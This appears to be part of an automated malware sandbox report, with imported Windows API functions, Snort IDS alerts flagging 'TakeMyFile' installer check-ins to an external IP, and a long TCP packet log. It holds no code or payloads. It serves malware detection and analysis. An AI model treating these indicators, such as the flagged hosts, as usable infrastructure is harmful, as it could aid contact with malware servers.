                                                                                              KERNEL32.dllCreateFileW, CloseHandle, WriteFile, DeleteFileW, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, RemoveDirectoryW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, MoveFileW, GetLastError, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, RaiseException, SetLastError, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, CreateEventW, SetEvent, InitializeCriticalSection, lstrcpynW, WaitForSingleObject, CreateThread, GetProcAddress, LoadLibraryExW, DecodePointer, Sleep, GetDiskFreeSpaceExW, GetExitCodeThread, GetCurrentProcessId, FreeLibrary, GetSystemDirectoryW, lstrlenW, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, GetModuleHandleW, LoadLibraryW, GetDriveTypeW, CompareStringW, FindFirstFileW, FindNextFileW, GetLogicalDriveStringsW, GetFileSize, GetFileAttributesW, GetShortPathNameW, SetFileAttributesW, GetFileTime, CopyFileW, ReadFile, SetFilePointer, SystemTimeToFileTime, FindClose, MultiByteToWideChar, WideCharToMultiByte, GetCurrentProcess, GetSystemInfo, WaitForMultipleObjects, ReadConsoleW, VirtualProtect, VirtualQuery, LoadLibraryExA, GetStringTypeW, SetUnhandledExceptionFilter, FileTimeToSystemTime, GetEnvironmentVariableW, GetEnvironmentStringsW, FormatMessageW, LocalFree, InitializeCriticalSectionEx, LoadLibraryA, GetModuleFileNameA, GetFullPathNameW, GetCurrentThread, GetConsoleOutputCP, FlushFileBuffers, SetConsoleTextAttribute, GetStdHandle, GetConsoleScreenBufferInfo, OutputDebugStringW, CreateProcessW, GetExitCodeProcess, GetTickCount, GetCommandLineW, SetCurrentDirectoryW, SetEndOfFile, EnumResourceLanguagesW, GetLocaleInfoW, GetSystemDefaultLangID, GetUserDefaultLangID, GetWindowsDirectoryW, GetSystemTime, GetDateFormatW, GetTimeFormatW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, ResetEvent, GlobalFree, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, GetLocalTime, CreateNamedPipeW, ConnectNamedPipe, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, IsWow64Process, TerminateThread, LocalAlloc, CompareFileTime, CopyFileExW, OpenEventW, PeekNamedPipe, IsDebuggerPresent, EncodePointer, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, QueryPerformanceCounter, QueryPerformanceFrequency, LCMapStringEx, GetSystemTimeAsFileTime, CompareStringEx, GetCPInfo, WaitForSingleObjectEx, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, GetModuleHandleExW, GetFileType, GetTimeZoneInformation, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetConsoleMode, IsValidCodePage, GetACP, GetOEMCP, GetFileSizeEx, SetFilePointerEx, FindFirstFileExW, GetCommandLineA, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, WriteConsoleW

                                                                                              Possible Origin

                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishUnited States

                                                                                              Network Behavior

                                                                                              Snort IDS Alerts

                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                              192.168.11.203.227.31.21149811802849814 08/10/22-06:48:01.939243TCP2849814ETPRO MALWARE TakeMyFile User-Agent4981180192.168.11.203.227.31.211
                                                                                              192.168.11.203.227.31.21149811802849813 08/10/22-06:48:01.939243TCP2849813ETPRO MALWARE TakeMyFile Installer Checkin4981180192.168.11.203.227.31.211
                                                                                              192.168.11.203.227.31.21149810802849813 08/10/22-06:48:01.629530TCP2849813ETPRO MALWARE TakeMyFile Installer Checkin4981080192.168.11.203.227.31.211
                                                                                              192.168.11.203.227.31.21149810802849814 08/10/22-06:48:01.629530TCP2849814ETPRO MALWARE TakeMyFile User-Agent4981080192.168.11.203.227.31.211

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Aug 10, 2022 06:46:43.166732073 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.166810036 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.167001963 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.198124886 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.198147058 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.241197109 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.241411924 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.243071079 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.243117094 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.243793964 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.251945972 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.294652939 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.403372049 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.403714895 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.403863907 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.403950930 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.403992891 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.404141903 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.404187918 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.404232979 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.404438972 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.412631989 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.412941933 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.413073063 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.413139105 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.413178921 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.413367987 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.413398027 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.413608074 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.413706064 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.413790941 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.413821936 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.414005041 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.414026976 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.414045095 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.414203882 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.414232969 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.414424896 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.414565086 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.414606094 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.414767027 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.414875031 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.414917946 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.414944887 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.415085077 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.415116072 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.415297985 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.415575027 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.415626049 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.423381090 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.423472881 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.423557997 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.423593044 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.423712969 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.423733950 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.423755884 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.423877954 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.423907995 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.424104929 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.424252033 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.424300909 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.424325943 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.424443960 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.424470901 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.424647093 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.424817085 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.424840927 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.424861908 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.425003052 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.425049067 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.425069094 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.425082922 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.425228119 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.425252914 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.425369024 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.425461054 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.425515890 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.425538063 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.425695896 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.425721884 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.425884962 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.425911903 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.426048994 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.426064968 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.426081896 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.426217079 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.426242113 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.426363945 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.426455021 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.426562071 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.426590919 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.426775932 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.426821947 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.426842928 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.426980972 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.427018881 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.427047014 CEST44349803140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:46:43.427174091 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:46:43.429219007 CEST49803443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.199162960 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.199246883 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.199564934 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.204046965 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.204099894 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.229286909 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.229543924 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.231378078 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.232076883 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.236282110 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.278558969 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.390896082 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.391282082 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.391475916 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.391541004 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.391763926 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.391968966 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.391990900 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.392015934 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.392172098 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.392213106 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.400597095 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.400774002 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.400809050 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.400845051 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.401112080 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.401175022 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.401204109 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.401406050 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.401509047 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.401559114 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.401585102 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.401751995 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.401913881 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.401930094 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.401956081 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.401973963 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.402175903 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.402296066 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.402327061 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.402507067 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.402612925 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.402667999 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.402693033 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.402878046 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.403067112 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.403126955 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.403450012 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.410218954 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.410443068 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.410644054 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.410690069 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.410712957 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.410942078 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.411010981 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.411040068 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.411263943 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.411309004 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.411673069 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.411781073 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.411884069 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.411984921 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.412014961 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.412167072 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.412224054 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.412359953 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.412385941 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.412508965 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.412552118 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.412640095 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.412743092 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.412769079 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.412935019 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.413039923 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.413104057 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.413131952 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.413139105 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.413295984 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.413326025 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.413500071 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.413568020 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.413678885 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.413860083 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.413888931 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.413896084 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.414099932 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.414205074 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.414228916 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.414236069 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.414402008 CEST44349805140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:09.414587975 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.414618015 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.414634943 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:09.414766073 CEST49805443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.019016027 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.019099951 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.019306898 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.025188923 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.025253057 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.051053047 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.051354885 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.052969933 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.053680897 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.062155008 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.102509975 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.207864046 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.208271027 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.208498001 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.208668947 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.208723068 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.208772898 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.208909988 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.209090948 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.209218979 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.209542990 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.209600925 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.209868908 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.217116117 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.217503071 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.217714071 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.217762947 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.217799902 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.218101025 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.218138933 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.218169928 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.218460083 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.218523026 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.218554020 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.218846083 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.218878984 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.218904018 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.219120979 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.219170094 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.219408035 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.219568968 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.219717979 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.219763041 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.220058918 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.220153093 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.220196009 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.220210075 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.220429897 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.220740080 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.220773935 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.227108955 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.227257013 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.227413893 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.227487087 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.227528095 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.227667093 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.227766991 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.227912903 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.228048086 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.228100061 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.228136063 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.228363037 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.228452921 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.228490114 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.228646040 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.228724003 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.228871107 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.228957891 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.228996038 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.229018927 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.229180098 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.229207039 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.229351997 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.229371071 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.229389906 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.229553938 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.229654074 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.229764938 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.229800940 CEST49807443192.168.11.20140.82.121.4
